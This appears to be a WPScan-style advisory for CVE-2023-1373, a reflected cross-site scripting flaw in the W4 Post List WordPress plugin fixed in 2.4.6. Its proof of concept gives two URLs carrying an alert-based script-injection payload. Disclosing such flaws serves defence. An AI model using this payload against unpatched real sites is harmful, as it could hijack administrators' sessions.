W4 Post List < 2.4.6 – Reflected XSS | CVE 2023-1373 | Plugin Vulnerabilities

Description

The plugin does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting

Proof of Concept

Make a logged in admin open https://example.com/wp-admin/edit.php?post_type=w4pl&page=w4pl-docs&a"><script>alert(/XSS/)</script>

On a page where there is a list with navigation displayed (put a [nav] in the template of the list) output, append the following payload: a"><script>alert(/XSS/)</script>, example: https://example.com/list/w4-post-list-1/?a"><script>alert(/XSS/)</script>

Affects Plugins

Fixed in 2.4.6

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Submitter website

https://wpscan.com

Verified

Yes

WPVDB ID

fa38f3e6-e04c-467c-969b-0f6736087589

Timeline

Publicly Published

2023-03-22 (about 1 years ago)

Added

2023-03-22 (about 1 years ago)

Last Updated

2023-03-22 (about 1 years ago)

Other

Published

Title

Published

2021-06-16

Title

WP JobSearch < 1.7.4 - Authenticated Stored XSS

Published

2024-04-12

Title

Carousel Slider < 2.2.10 - Editor+ Stored XSS

Published

2022-06-21

Title

CDI < 5.1.9 - Reflected Cross-Site-Scripting

Published

2022-11-17

Title

Ultimate Tables <= 1.6.5 - Reflected Cross-Site Scripting

Published

2014-01-20

Title

Nokia Maps & Places <= 1.6.6 - Reflected Cross-Site Scripting (XSS)